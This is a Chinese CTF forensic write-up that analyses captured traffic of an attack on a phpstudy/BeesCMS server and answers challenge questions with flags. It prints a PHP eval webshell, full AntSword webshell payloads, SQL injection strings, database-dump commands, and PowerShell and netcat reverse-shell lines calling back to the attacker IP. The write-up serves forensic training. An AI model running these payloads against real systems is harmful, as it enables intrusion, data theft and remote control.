陇剑杯 省赛 攻击者1

题目

链接：https://pan.baidu.com/s/1KSSXOVNPC5hu_Mf60uKM2A?pwd=haek 
提取码：haek
├───LogAnalize
│   ├───linux简单日志分析
│   │       linux-log_2.zip
│   │
│   ├───misc日志分析
│   │       access.log
│   │
│   ├───misc简单日志分析
│   │       app.log
│   │
│   ├───sql注入分析
│   │       SQL.zip
│   │
│   └───windows日志分析
│           security-testlog_2.zip
│
├───ProvinceAttacker
│   └───pcap
│           01 Web.pcapng
│           02 DC.pcapng
│           02 Web-ToInternet.pcapng
│           02 Web-ToIntranet.pcapng
│           03 Web.pcapng
│           pcap.zip
│
└───TrafficAnalize
    ├───ios
    │       ios.zip
    │
    └───webshell
            hack.pcap

本文题目在ProvinceAttacker中，01 Web.pcapng

攻击者 1

1-1

分析主机及流量，提交第一个成功Getshell的攻击者IP地址。

flag
10.11.43.4

看一下post包

看到恶意url请求

 [truncated]POST /admin/login.php?action=ck_login&BGol=8278%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%

url解出

 [truncated]POST /admin/login.php?action=ck_login&BGol=8278 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**%

是个xss攻击

1-2

提交Web应用访问日志的名称及绝对路径，如：C:\log.txt。

本题在没在线虚拟机的情况下没法直接做

路径为C盘，phpstudy（大于2020）新版安装下的apache默认访问日志路径

这题爆0，乐了

1-3

第一个攻击者获取到了后台登录密码，请提交攻击者通过sql注入获取到的后台登录密码。

flag
admin123

使用wireshark过滤语句

http.request.method == "POST" and http contains "login"

找到包含登录信息的包

前面的数据包是一些盲注

最后黑客将在login.php中登录，直接看黑客输的密码是即可

1-4

第一个攻击者成功登录后台，请提交攻击者成功登录后台后访问到管理员面板的时间，以系统时间（UTC +8）为准，如：01/Dec/2021:12:00:01。

注意时区，UTC+8时区

flag
23/Dec/2021:19:25:56

菜单设置中改一下时间显示格式

我对这个flag有疑问

54秒发登录包，密码输入正确admin123
55秒回包302
55秒请求admin.php
57秒响应html

这个应当是小误差，就当是56秒吧

网络传输有时间差，具体情况具体分析

1-5

第一个攻击者了利用文件上传漏洞，上传了Webshell，请提交第一个攻击者上传的Webshell的文件的MD5值。

138683	2021-12-23 19:27:44.072126	10.11.43.4	10.20.24.62	HTTP	377	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)

后续的post操作集中在/upload/img/202112231926441247.php中，推测有马

包138683在wireshark中info显示有(image/png)，推测这应该是黑客上传的webshell

导出分组字节流

在.bin字节流文件中看到了马`<?php @eval($_REQUEST[1]);?>

将多余的内容删掉，留下的内容如图（要加个回车，这个文件有两行）

windows中用 certutil -hashfile <filename> md5 算出文件的md5值

MD5 hash of ma.bin:
1f5a9c2a32aabe76a8442777657a1cf9
CertUtil: -hashfile command completed successfully.

flag
1f5a9c2a32aabe76a8442777657a1cf9

1-6

第一个攻击者访问了敏感文件，得到MySQL数据库的密码。请提交攻击者访问的敏感文件的文件名，如：1.php

配置文件.ini一般有账号密码等信息。直接搜.ini文件找不到，因为参数中观察到的编码为base64，黑客通过对post参数的url解码，然后执行命令

在数据包

140290	2021-12-23 19:27:58.182000	10.11.43.4	10.20.24.62	HTTP	89	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)

中 post 体 中的参数是有趣的

HTML Form URL Encoded: application/x-www-form-urlencoded
     [truncated]Form item: "1" = "@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".c8a6ec5f3c";@mkdir($tmdi
    Form item: "x67fff8f606c8b" = "OvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA=="

黑客写入的代码是

@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".c8a6ec5f3c";@
    mkdir($tmdir);@
    chdir($tmdir);@
    ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
    @
        chdir("..");
    }@
    ini_set("open_basedir", "/");@
    rmdir($ocwd.
        "/".$tmdir);
};

function asenc($out) {
    
    return $out;
};

function asoutput() {
    
    $output = ob_get_contents();
    ob_end_clean();
    echo "d39c0".
    "afca3";
    echo@ asenc($output);
    echo "d27c".
    "6600";
}
ob_start();
try {
    
    $F = base64_decode(substr($_POST["x67fff8f606c8b"], 2));
    $P = @fopen($F, "r");
    echo(@fread($P, filesize($F) ? filesize($F) : 4096));@
    fclose($P);;
} catch (Exception $e) {
    
    echo "ERROR://".$e - > getMessage();
};
asoutput();
die();

不难看出$F = base64_decode(substr($_POST["x67fff8f606c8b"], 2))，对键x67fff8f606c8b的值去掉前两位后进行base64解码

解出

C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.php

config.php为配置文件，mysql密码应当就写在其中吧

flag
confing.php

1-7

第一个攻击者在获取到数据库口令后，对数据库进行了拖库。请提交攻击者拖库数据库的名称。

观察数据包

146520	2021-12-23 19:28:52.059518	10.11.43.4	10.20.24.62	HTTP	766	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)

黑客写了一段代码

@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".278c68b";@
    mkdir($tmdir);@
    chdir($tmdir);@
    ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
    @
        chdir("..");
    }@
    ini_set("open_basedir", "/");@
    rmdir($ocwd.
        "/".$tmdir);
};

function asenc($out) {
    
    return $out;
};

function asoutput() {
    
    $output = ob_get_contents();
    ob_end_clean();
    echo "2fb96".
    "62ed12";
    echo@ asenc($output);
    echo "edc2c".
    "13c82";
}
ob_start();
try {
    
    $f = base64_decode(substr($_POST["oe6306e1fc193"], 2));
    $c = $_POST["b91f2c6a32d6e7"];
    $c = str_replace("\r", "", $c);
    $c = str_replace("\n", "", $c);
    $buf = "";
    for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));
    echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {
    
    echo "ERROR://".$e - > getMessage();
};
asoutput();
die();

对post体中的键oe6306e1fc193截断前两位，做base64解码

Value: dvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==

解出

C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql

推测黑客进行了数据库操作

另一个键b91f2c6a32d6e7的值看起来不像base64，而在代码中它是直接运算的，考虑它的加密方式是hex(十六进制)

Value [truncated]: 75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D69

完整值

75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B

hex解码

use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;

mysql在命令行中操作use <数据库>

黑客对bees数据库拖库

flag
bees

1-8

第一个攻击者上传了文件用于创建反弹shell，请还原该文件并提交该文件的MD5值。

这题没解出来，跳过

1-9

第一个攻击者利用工具反弹shell，请提交回连的端口。

在包中

227682	2021-12-23 19:41:41.849164	10.11.43.4	10.20.24.62	HTTP	636	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)

黑客写入代码

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    
	$oparr=preg_split("/\\\\|\//",$opdir);
	$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
	$tmdir=".429d4";
	@mkdir($tmdir);
	@chdir($tmdir);
	@ini_set("open_basedir","..");
	for ($i=0;$i<sizeof($oparr);$i++) {
    
		@chdir("..");
	}
	@ini_set("open_basedir","/");
	@rmdir($ocwd."/".$tmdir);
}
;
function asenc($out) {
    
	return $out;
}
;
function asoutput() {
    
	$output=ob_get_contents();
	ob_end_clean();
	echo "7a5d"."bc377";
	echo @asenc($output);
	echo "cff"."cb78";
}
ob_start();
try {
    
	$p=base64_decode(substr($_POST["q52db3dce849a"],2));
	$s=base64_decode(substr($_POST["za724065ab2aa8"],2));
	$envstr=@base64_decode(substr($_POST["v4ddc5d989f9d5"],2));
	$d=dirname($_SERVER["SCRIPT_FILENAME"]);
	$c=substr($d,0,1)=="/"?"-c \"{
      $s}\"":"/c \"{
      $s}\"";
	if(substr($d,0,1)=="/") {
    
		@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
	} else {
    
		@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
	}
	if(!empty($envstr)) {
    
		$envarr=explode("|||asline|||", $envstr);
		foreach($envarr as $v) {
    
			if (!empty($v)) {
    
				@putenv(str_replace("|||askey|||", "=", $v));
			}
		}
	}
	$r="{
      $p} {
      $c}";
	function fe($f) {
    
		$d=explode(",",@ini_get("disable_functions"));
		if(empty($d)) {
    
			$d=array();
		} else {
    
			$d=array_map('trim',array_map('strtolower',$d));
		}
		return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
	}
	;
	function runshellshock($d, $c) {
    
		if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
    
			if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
    
				$tmp = tempnam(sys_get_temp_dir(), 'as');
				putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
				if (fe('error_log')) {
    
					error_log("a", 1);
				} else {
    
					mail("[email protected]", "", "", "-bv");
				}
			} else {
    
				return False;
			}
			$output = @file_get_contents($tmp);
			@unlink($tmp);
			if ($output != "") {
    
				print($output);
				return True;
			}
		}
		return False;
	}
	;
	function runcmd($c) {
    
		$ret=0;
		$d=dirname($_SERVER["SCRIPT_FILENAME"]);
		if(fe('system')) {
    
			@system($c,$ret);
		} elseif(fe('passthru')) {
    
			@passthru($c,$ret);
		} elseif(fe('shell_exec')) {
    
			print(@shell_exec($c));
		} elseif(fe('exec')) {
    
			@exec($c,$o,$ret);
			print(join("
",$o));
		} elseif(fe('popen')) {
    
			$fp=@popen($c,'r');
			while(!@feof($fp)) {
    
				print(@fgets($fp,2048));
			}
			@pclose($fp);
		} elseif(fe('proc_open')) {
    
			$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
			while(!@feof($io[1])) {
    
				print(@fgets($io[1],2048));
			}
			while(!@feof($io[2])) {
    
				print(@fgets($io[2],2048));
			}
			@fclose($io[1]);
			@fclose($io[2]);
			@proc_close($p);
		} elseif(fe('antsystem')) {
    
			@antsystem($c);
		} elseif(runshellshock($d, $c)) {
    
			return $ret;
		} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
    
			$w=new COM('WScript.shell');
			$e=$w->exec($c);
			$so=$e->StdOut();
			$ret.=$so->ReadAll();
			$se=$e->StdErr();
			$ret.=$se->ReadAll();
			print($ret);
		} else {
    
			$ret = 127;
		}
		return $ret;
	}
	;
	$ret=@runcmd($r." 2>&1");
	print ($ret!=0)?"ret={
      $ret}":"";
	;
}
catch(Exception $e) {
    
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

CfY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=

解出

cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8

端口为5678，这是nc64.exe的使用

flag
5678

1-10

第一个攻击者为了持续获得敏感数据，在系统中留下了持久化项，请提交该项的具体名称，如：persistence。

这题没解出来

未解决的疑问

在第五题

第一个攻击者了利用文件上传漏洞，上传了Webshell，请提交第一个攻击者上传的Webshell的文件的MD5值。

getshell用的是一句话木马，为啥要在马后面加个回车？

考虑出题者出题时的写文件习惯

文件内容不同，算出的md5也就不同

随手的记录

边看边解

黑客执行命令的记录

这部分不重要，不用看

139039
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkL2ltZy8=
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img/

139279
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkLw==
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/

139435
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cv
C:/Program Files/phpstudy/PHPTutorial/WWW/

139827
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS8=
C:/Program Files/phpstudy/PHPTutorial/WWW/data/

140290
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA==
C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.php

this is a flag



change key


140974
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC8=
C:/Program Files/phpstudy/PHPTutorial/

141174
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC8=
C:/Program Files/phpstudy/PHPTutorial/MySQL/

141491
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/

141655
Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 0273924&cd&echo bc6d88e68

cmd

143282
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsZHVtcC5leGUgLXVyb290IC1wcm9vdCBiZWVzID4gYmFjay5zcWwmZWNobyAwMjczOTI0JmNkJmVjaG8gYmM2ZDg4ZTY4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysqldump.exe -uroot -proot bees > back.sql&echo 0273924&cd&echo bc6d88e68

143754
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68

144181


145025
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vYmFjay5zcWw=
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/back.sql

146520
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql

75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B
use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;

this is a flag




try to get faster

Value: AkQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/

Value: JAY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68

Value: aIY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsLmV4ZSAtdXJvb3QgLXByb290IDwgdXBkYXRlLnNxbCZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysql.exe -uroot -proot < update.sql&echo 0273924&cd&echo bc6d88e68

Value [truncated]: fuY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9jcmVhdGUgL3RuIFVwZGF0ZVNRTCAvdHIgIiJDOi9Qcm9ncmFtIEZpbGVzL3BocHN0dWR5L1BIUFR1dG9yaWFsL015U1FML2Jpbi9teXNxbC5leGUiIC11cm9vdC

Value: pwY2QgL2QgInJldD0xIiY7JmVjaG8gMDI3MzkyNCZjZCZlY2hvIGJjNmQ4OGU2OA==
cd /d "ret=1"&;&echo 0273924&cd&echo bc6d88e68

Value: d7Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 5725ff6e9&cd&echo 99a07eb8


Value: OWY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8

Value: A1Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmNoY3AgNjUwMDEmZWNobyA1NzI1ZmY2ZTkmY2QmZWNobyA5OWEwN2ViOA==
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&chcp 65001&echo 5725ff6e9&cd&echo 99a07eb8

Value: K9Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8


178849	2021-12-23 19:33:47.048736	10.11.43.4	10.20.24.62	HTTP	1302	POST /upload/img/202112231926441247.php HTTP/1.1  (application/x-www-form-urlencoded)
Value [truncated]: MMY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnBvd2Vyc2hlbGwgLW5vcCAtYyAiJGNsaWVudCA9IE5ldy1PYmplY3QgTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMS40My40Jyw1Njc4KTskc3RyZWFtID0gJGNsaWVudC5HZX
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('10.11.43.4',5678);$s


Value: P0QzovUHJvZ3JhbSBGaWxlcy8=
C:/Program Files/

216872


216872
Value: 5CQzovUHJvZ3JhbSBGaWxlcy9uYzY0LmV4ZQ==
C:/Program Files/nc64.exe



227682
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=

cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8

this is a flag


admin_pic_upload.php%3ftype=radio&get=thumb